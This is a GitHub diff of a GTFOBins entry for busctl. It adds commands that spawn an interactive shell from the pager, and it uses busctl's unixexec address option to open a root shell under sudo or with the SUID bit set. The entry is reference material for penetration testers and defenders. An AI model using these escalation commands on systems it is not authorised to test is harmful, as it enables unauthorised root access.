File tree Expand file tree Collapse file tree 1 file changed +8
-4
lines changed
Expand file tree Collapse file tree 1 file changed +8
-4
lines changed Original file line number Diff line number Diff line change 11---
2- description : This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
32functions :
43 shell :
5- - code : |
4+ - description : This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
5+ code : |
66 busctl --show-machine
77 !/bin/sh
8+ - code : |
9+ busctl set-property org.freedesktop.systemd1 /org/freedesktop/systemd1 org.freedesktop.systemd1.Manager LogLevel s debug --address=unixexec:path=/bin/sh,argv1=-c,argv2='/bin/sh -i 0<&2 1>&2'
810 sudo :
911 - code : |
10- sudo busctl --show-machine
11- !/bin/sh
12+ sudo busctl set-property org.freedesktop.systemd1 /org/freedesktop/systemd1 org.freedesktop.systemd1.Manager LogLevel s debug --address=unixexec:path=/bin/sh,argv1=-c,argv2='/bin/sh -i 0<&2 1>&2'
13+ suid :
14+ - code : |
15+ ./busctl set-property org.freedesktop.systemd1 /org/freedesktop/systemd1 org.freedesktop.systemd1.Manager LogLevel s debug --address=unixexec:path=/bin/sh,argv1=-pc,argv2='/bin/sh -p -i 0<&2 1>&2'
1216---
You can’t perform that action at this time.
0 commit comments